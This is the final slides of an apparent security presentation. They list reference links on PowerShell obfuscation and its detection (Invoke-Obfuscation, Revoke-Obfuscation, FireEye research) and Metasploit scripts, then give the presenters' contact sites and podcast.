    Obfuscation
    • http://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide
    • http://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide-part-2
    • https://github.com/danielbohannon/Revoke-Obfuscation
    • https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf
    • https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html
    Metasploit Check Logging module
    • https://github.com/darkoperator/Meterpreter-Scripts/tree/master/scripts
  • 76.
    Questions?
    You can find us at:
    • Log-MD.com
    • @HackerHurricane
    • HackerHurricane.com (blog)
    • MalwareArchaeology.com – Cheat Sheets
    • Listen to the "Brakeing Down Incident Response" Podcast – BDIRPodcast.com